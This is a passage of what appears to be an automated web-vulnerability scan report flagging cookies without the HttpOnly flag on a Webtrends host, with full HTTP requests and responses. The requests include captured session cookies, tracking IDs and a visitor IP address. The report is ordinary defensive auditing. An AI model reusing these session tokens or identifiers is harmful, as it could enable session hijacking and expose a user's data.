14.43. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2aced63bcbecaea3ed3a960df96636a50643ac4c077cfcf2ab2b4f69a511cb2c508b53b6b10fa75491fe117f85cd1bbd2369a14ecbab07e205840fd26e46a93102f57ec24a887e21ebe2728618ac4e9a233620715296e4dcf1a8572a81b9ec9ed08bfac9b1a2795108a59481d1821e170dd71d6f13800cd1520d206bd749c857ede7eaaf12f12b12448f2f341f726fc67610313d28f1b36a7284672840374015395796c7189e9ca4b67db75372df29e6681417736ebfe5ba3207581411e17dd0e092a847da1f059e8c7017f846964d5cfa26ffc752c9a523fedce0690a1930e725a0fc462c39007398946f184cd768caffa56da0c5a1fa0a8c33ff425425572c8fc343095d0056e9b41a1d0b81ba8a120915ede5ef488404e0191c8dcdb69eb66f0d7d1cb54fc2210a2b6eab51b378ce8efe9c0d3660f158911d8584ecbdc3736d516e0ef0ca50cf1c01f6aad100ee9eff758f87ae822e1251aa5625762a176b0c3deb26f07de003dc4d1165609d739e7940960d12892f7d4d3df41a33f7392629e9a88158e21f87e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804009b7a9785aec6aa907369e4ec4b4ecbc62181a3139473a185596f6e7c1ee82cc2aff2d32cb37e3f38461430c44548181f829b96e5396a29d5cf195d886516e38add783733d57b251aa8a98393ad4374c6812696d1d3246e205fd7bc5ce04f8a2fc4fd1aa3a119c545fcf0c2f58806f334fcc0978cdb4daeda47f429aa17cbd86b6cb319e5814ad94fa96ff6b845b1b7681589ba7340bf704fcaf8872bf7568a04be232d6ceee90f8d7c1217f46dc71beeb48e8b9ffc57c2054722be6b77f36bc5b30f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e3a1b89d73931d54fb7291b05785c68  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2aced63bcbecaea3ed3a960df96636a50643ac4c077cfcf2ab2b4f69a511cb2c508b53b6b10fa75491fe117f85cd1bbd2369a14ecbab07e205840fd26e46a93102f57ec24a887e21ebe2728618ac4e9a233620715296e4dcf1a8572a81b9ec9ed08bfac9b1a2795108a59481d1821e170dd71d6f13800cd1520d206bd749c857ede7eaaf12f12b12448f2f341f726fc67610313d28f1b36a7284672840374015395796c7189e9ca4b67db75372df29e6681417736ebfe5ba3207581411e17dd0e092a847da1f059e8c7017f846964d5cfa26ffc752c9a523fedce0690a1930e725a0fc462c39007398946f184cd768caffa56da0c5a1fa0a8c33ff425425572c8fc343095d0056e9b41a1d0b81ba8a120915ede5ef488404e0191c8dcdb69eb66f0d7d1cb54fc2210a2b6eab51b378ce8efe9c0d3660f158911d8584ecbdc3736d516e0ef0ca50cf1c01f6aad100ee9eff758f87ae822e1251aa5625762a176b0c3deb26f07de003dc4d1165609d739e7940960d12892f7d4d3df41a33f7392629e9a88158e21f87e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804009b7a9785aec6aa907369e4ec4b4ecbc62181a3139473a185596f6e7c1ee82cc2aff2d32cb37e3f38461430c44548181f829b96e5396a29d5cf195d886516e38add783733d57b251aa8a98393ad4374c6812696d1d3246e205fd7bc5ce04f8a2fc4fd1aa3a119c545fcf0c2f58806f334fcc0978cdb4daeda47f429aa17cbd86b6cb319e5814ad94fa96ff6b845b1b7681589ba7340bf704fcaf8872bf7568a04be232d6ceee90f8d7c1217f46dc71beeb48e8b9ffc57c2054722be6b77f36bc5b30f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e3a1b89d73931d54fb7291b05785c68

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2aced63bcbecaea3ed3a960df96636a50643ac4c077cfcf2ab2b4f69a511cb2c508b53b6b10fa75491fe117f85cd1bbd2369a14ecbab07e205840fd26e46a93102f57ec24a887e21ebe2728618ac4e9a233620715296e4dcf1a8572a81b9ec9ed08bfac9b1a2795108a59481d1821e170dd71d6f13800cd1520d206bd749c857ede7eaaf12f12b12448f2f341f726fc67610313d28f1b36a7284672840374015395796c7189e9ca4b67db75372df29e6681417736ebfe5ba3207581411e17dd0e092a847da1f059e8c7017f846964d5cfa26ffc752c9a523fedce0690a1930e725a0fc462c39007398946f184cd768caffa56da0c5a1fa0a8c33ff425425572c8fc343095d0056e9b41a1d0b81ba8a120915ede5ef488404e0191c8dcdb69eb66f0d7d1cb54fc2210a2b6eab51b378ce8efe9c0d3660f158911d8584ecbdc3736d516e0ef0ca50cf1c01f6aad100ee9eff758f87ae822e1251aa5625762a176b0c3deb26f07de003dc4d1165609d739e7940960d12892f7d4d3df41a33f7392629e9a88158e21f87e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804009b7a9785aec6aa907369e4ec4b4ecbc62181a3139473a185596f6e7c1ee82cc2aff2d32cb37e3f38461430c44548181f829b96e5396a29d5cf195d886516e38add783733d57b251aa8a98393ad4374c6812696d1d3246e205fd7bc5ce04f8a2fc4fd1aa3a119c545fcf0c2f58806f334fcc0978cdb4daeda47f429aa17cbd86b6cb319e5814ad94fa96ff6b845b1b7681589ba7340bf704fcaf8872bf7568a04be232d6ceee90f8d7c1217f46dc71beeb48e8b9ffc57c2054722be6b77f36bc5b30f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e3a1b89d73931d54fb7291b05785c68 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/brokerage.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=DD03FBD6C5716741DEF4FC9264E5B178; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a025a8920; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02b1d29a; _wt.mode-79569=fcdcc722e93202cf02d7

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:09 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=1DB1B8506FA734F3D0691621AC32919E; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.44. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91e2a0efa36ac84fe5603ea1084fb20b5110e3f2d96a0830e5669c6335d107f5b279d0038afc0b2c92c519ef216efd1295a053fb009010c10078e57c59f26cc1098a3427a3e6729e19a91c9920397c715895f495eb943b6a94e7ba8e8c91f3d8aab9143c44e49acbcb8f0d1740de4d3d1dd305dd52532473d4569c4aabf0b0f558e63a0955e43b24556129c6365831657bf4ec7d70c46323403441156c01c6954bc5cba7e57ee1537c8f29b73a414c7269e9e6ee3407591f11bb7ed6b1caff13d91f509eda221dad45c34c0cf87ffbc400c9a770aedeb26d5c4237b372f5fa4d2e390773cbc46b151f9077da91975687f3d5ef569b3ba201196669169b81480b495e40bdfb4e1f0887ba8d170815edaae64b8252b71916d4c1b987e4645e2e1eb94599210a363cae58b67e918ef4940e2967e2408a24bc93a9e3966733176d16f087009a0153f0a9de0db4c4f7298f9cbb9917791dea597e3224533f1b29f0189c6cf157c30b1c7165d221cf711693061ed02f72513cf8073fd519140cca99814ee22994b051a8eed2abb52957ac7babc8f33ed77262068caf0e18c1670659ee15107f88a247a9eaf9bf708443774ac143178f749fd3adcdedcf373fbfe24e1ccec47186fb18c122a48b5e6c3e7019e47f96a9a7882ee7796d3043123096441e1a1882cbc6e66e342485ce1258893910e3dc8478376682747748a0f88295f6117196d774ca84d0723b7b5284bb59b648db72c6ff4ea0a44b9411fbfac5a1d105f767f394918cd94efd8843ff78ab4b9c886d6cb141ef811e8014a168a5ef4ab1e669408ebb7110e57c48cbaa8226f001d45fbc232a6ebce008862c4040a73fc348bfb5848ec8ae07c2044027be317ef43accb61b5a6d762ed8133a92a5a64063f21795c1b1df419f6f1fa2a0d89d8e71ac8a262e3d4edad63b64db4fb7291b01cbfec7  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91e2a0efa36ac84fe5603ea1084fb20b5110e3f2d96a0830e5669c6335d107f5b279d0038afc0b2c92c519ef216efd1295a053fb009010c10078e57c59f26cc1098a3427a3e6729e19a91c9920397c715895f495eb943b6a94e7ba8e8c91f3d8aab9143c44e49acbcb8f0d1740de4d3d1dd305dd52532473d4569c4aabf0b0f558e63a0955e43b24556129c6365831657bf4ec7d70c46323403441156c01c6954bc5cba7e57ee1537c8f29b73a414c7269e9e6ee3407591f11bb7ed6b1caff13d91f509eda221dad45c34c0cf87ffbc400c9a770aedeb26d5c4237b372f5fa4d2e390773cbc46b151f9077da91975687f3d5ef569b3ba201196669169b81480b495e40bdfb4e1f0887ba8d170815edaae64b8252b71916d4c1b987e4645e2e1eb94599210a363cae58b67e918ef4940e2967e2408a24bc93a9e3966733176d16f087009a0153f0a9de0db4c4f7298f9cbb9917791dea597e3224533f1b29f0189c6cf157c30b1c7165d221cf711693061ed02f72513cf8073fd519140cca99814ee22994b051a8eed2abb52957ac7babc8f33ed77262068caf0e18c1670659ee15107f88a247a9eaf9bf708443774ac143178f749fd3adcdedcf373fbfe24e1ccec47186fb18c122a48b5e6c3e7019e47f96a9a7882ee7796d3043123096441e1a1882cbc6e66e342485ce1258893910e3dc8478376682747748a0f88295f6117196d774ca84d0723b7b5284bb59b648db72c6ff4ea0a44b9411fbfac5a1d105f767f394918cd94efd8843ff78ab4b9c886d6cb141ef811e8014a168a5ef4ab1e669408ebb7110e57c48cbaa8226f001d45fbc232a6ebce008862c4040a73fc348bfb5848ec8ae07c2044027be317ef43accb61b5a6d762ed8133a92a5a64063f21795c1b1df419f6f1fa2a0d89d8e71ac8a262e3d4edad63b64db4fb7291b01cbfec7

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91e2a0efa36ac84fe5603ea1084fb20b5110e3f2d96a0830e5669c6335d107f5b279d0038afc0b2c92c519ef216efd1295a053fb009010c10078e57c59f26cc1098a3427a3e6729e19a91c9920397c715895f495eb943b6a94e7ba8e8c91f3d8aab9143c44e49acbcb8f0d1740de4d3d1dd305dd52532473d4569c4aabf0b0f558e63a0955e43b24556129c6365831657bf4ec7d70c46323403441156c01c6954bc5cba7e57ee1537c8f29b73a414c7269e9e6ee3407591f11bb7ed6b1caff13d91f509eda221dad45c34c0cf87ffbc400c9a770aedeb26d5c4237b372f5fa4d2e390773cbc46b151f9077da91975687f3d5ef569b3ba201196669169b81480b495e40bdfb4e1f0887ba8d170815edaae64b8252b71916d4c1b987e4645e2e1eb94599210a363cae58b67e918ef4940e2967e2408a24bc93a9e3966733176d16f087009a0153f0a9de0db4c4f7298f9cbb9917791dea597e3224533f1b29f0189c6cf157c30b1c7165d221cf711693061ed02f72513cf8073fd519140cca99814ee22994b051a8eed2abb52957ac7babc8f33ed77262068caf0e18c1670659ee15107f88a247a9eaf9bf708443774ac143178f749fd3adcdedcf373fbfe24e1ccec47186fb18c122a48b5e6c3e7019e47f96a9a7882ee7796d3043123096441e1a1882cbc6e66e342485ce1258893910e3dc8478376682747748a0f88295f6117196d774ca84d0723b7b5284bb59b648db72c6ff4ea0a44b9411fbfac5a1d105f767f394918cd94efd8843ff78ab4b9c886d6cb141ef811e8014a168a5ef4ab1e669408ebb7110e57c48cbaa8226f001d45fbc232a6ebce008862c4040a73fc348bfb5848ec8ae07c2044027be317ef43accb61b5a6d762ed8133a92a5a64063f21795c1b1df419f6f1fa2a0d89d8e71ac8a262e3d4edad63b64db4fb7291b01cbfec7 HTTP/1.1
Host: ots.optimize.webtrends.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.barclayswealth.com/international/international-bank-account.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=245968D340BB5968593028CAA74B029E; WT_FPC_A=id=50.23.123.106-4086325760.30173190:lv=1314883489615:ss=1314882906914; company_history=%5B%5B%22http%3A//forums.webtrends.com/webtrends%22%2C%22Webtrends%22%5D%5D; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1314912397811:ss=1314912369532; _wt.control-79569-ta_11ApplyNowStep2ABn=e991c52eef3b746311a996e09a3d5f50606c466e8252e8c35a352f883792295c08711c8cc9f058f2621e33c799e3734cddf5e2e7af3f58ba292e6f763a8c6def471920c89142c67297c67c94121355d8b0023d832645ba3e5e83c11e2d02b1d29a; _wt.mode-79569=fcdcc722e932033a5f6d; _wt.user-79569=e991d63afa2c457f049a9cb6c86b17073279512ace11f5c6273e3cfa71d47111713c47fdc9f05bb4642e329fdaf77f5a9aaaaea6fc6d4eae327826273a807ab93a497c8bd753c863c6823f920516149ffb1376dd264cae3c5288cc0d6999f494b8f4fe589a3de9ed764acb9a05651019

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:02:11 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=03955303B3331E793004A3981BAFE30B; Path=/ots
Via: 1.1 ots.optimize.webtrends.com
p3p: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Vary: Accept-Encoding, User-Agent
Content-Length: 1695
Connection: Keep-Alive


/**
* Copyright 2005-2009 webtrends All Rights Reserved.
* WEBTRENDS PROPRIETARY/CONFIDENTIAL. Use is subject to license terms.
*
* $Id: js.jsp,v 3.0 2009-11-24 23:15:52 michae
...[SNIP]...
14.45. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91f4bce4a535901afd613eb60454f94b522ae5a0f92f493ea819c172569003b3b509f70f9aa24b28c9cf18bd706efe47c3f107ad579e17c40820ea7d59a73ecc0eda6324f0e772cd4dac1acc2f3c2c715f94f6c6b2c43b6d93e0b9de8bcdf8dfa4b5163d49b4cecec1895d4011d61c3d1d8301890b0122218051c14dfda0b1fa50b53a5c57e46e2206617f97330e60312ff4b22c719037281a32451b6c03c6c349c599a4e47ae3017e8a76e43e41167a6fe9b7be30030f4013e12cd9e395ad1bdc1d009a8a2413fa43c24609a524fd930fc9a171fed4e5610d4234e974a0fd4e2c6c04779992691c4b8b62cdf3fa2bed81c19933ff0285010f665f2dccd90735341116e1b45d141b87ac89150a13e6b1e44b8456ac111cddceba90ec6f572f05b14f902e092134a551b7659984fd9b0d3e6ff8549e55d2c4f1acab1a7c41315ae693139b015aeda9d916bccefe268c87ae8370104ab216424f6b05635a27e865f23ba918e6765327398632c66210880e14d920714634ee0e278e5c575e979ed70fa30591e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804039621c3d0fd96fec5706fb0ea1a49c19523d6a84f9321f3d900393f7d41e52995adf5d52fe17039304c456396481d1e49dace94e56a6027d2c0195ad86e47e588d47e3f37d227744aa3a98790ad4024c38176c6d2d2766f2a5081ba0ae048df7dc2f816f6a519c715ffa290f98202a531a1c6c28d8f4eaddf44fb79f8409c8b6763b513b3804dd447fe3ff1ba45e3b16244d2ef7115e3271dc0fc857ca002d000ef252a67b2e658db2c1312f56fc51abde481809fae009f051222bc3f75f269c9e10f4f76103f9804639ff9a55932ae179bc1f2d6079c351ea5f4d99bdd77f780752e3d4bd8856960db4fb7291b054e9cd9  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ots.optimize.webtrends.com
Path:   /ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa33ca13e01f0ab4cc21ccfbe9deaf07d9823e50200883b4a9494157cf993b1530fc8ec5a20c6c02bb6a519ac309cd53d13930399dfcec40d4ba34bdcb49d5040977a6c942538dd2b349acaaab776afd291f133d65e7c19b4b59195b333786d7458ca3246a4c79b4d3554ac7341eed2ddf539c066214af59d933a843f074e1a03050f238d52850a151276c5e1f6164e83be5483128932fbfe7b3d840e2e43a05f3d36ff62ebdae1f455adfaabea8c6d404a22d55c8c81de5a94d5a431844858e7ce2b961a1a73999c9b59aa6785822b44a7bdb411158e2a51b18ea5a484b1dbc355ab7264a33f2341c324a1dab0eba7fd51891df9df16a27eebc92d1840dd114825d9d2266e79e2c2e037aab4b430bd4948080dd3119b8d9a275bb094bb71551b580ce57dcf841c12416469116e7dc5364d09bb49c1d9dfef6571b651b80df42fd09876d218b517a2acefe3a91f4bce4a535901afd613eb60454f94b522ae5a0f92f493ea819c172569003b3b509f70f9aa24b28c9cf18bd706efe47c3f107ad579e17c40820ea7d59a73ecc0eda6324f0e772cd4dac1acc2f3c2c715f94f6c6b2c43b6d93e0b9de8bcdf8dfa4b5163d49b4cecec1895d4011d61c3d1d8301890b0122218051c14dfda0b1fa50b53a5c57e46e2206617f97330e60312ff4b22c719037281a32451b6c03c6c349c599a4e47ae3017e8a76e43e41167a6fe9b7be30030f4013e12cd9e395ad1bdc1d009a8a2413fa43c24609a524fd930fc9a171fed4e5610d4234e974a0fd4e2c6c04779992691c4b8b62cdf3fa2bed81c19933ff0285010f665f2dccd90735341116e1b45d141b87ac89150a13e6b1e44b8456ac111cddceba90ec6f572f05b14f902e092134a551b7659984fd9b0d3e6ff8549e55d2c4f1acab1a7c41315ae693139b015aeda9d916bccefe268c87ae8370104ab216424f6b05635a27e865f23ba918e6765327398632c66210880e14d920714634ee0e278e5c575e979ed70fa30591e653e7dec1bab67d01f739e085a53186283353d6b5484bfb6f042aae564f67f3ab069ebcb0ed1db275371d8804039621c3d0fd96fec5706fb0ea1a49c19523d6a84f9321f3d900393f7d41e52995adf5d52fe17039304c456396481d1e49dace94e56a6027d2c0195ad86e47e588d47e3f37d227744aa3a98790ad4024c38176c6d2d2766f2a5081ba0ae048df7dc2f816f6a519c715ffa290f98202a531a1c6c28d8f4eaddf44fb79f8409c8b6763b513b3804dd447fe3ff1ba45e3b16244d2ef7115e3271dc0fc857ca002d000ef252a67b2e658db2c1312f56fc51abde481809fae009f051222bc3f75f269c9e1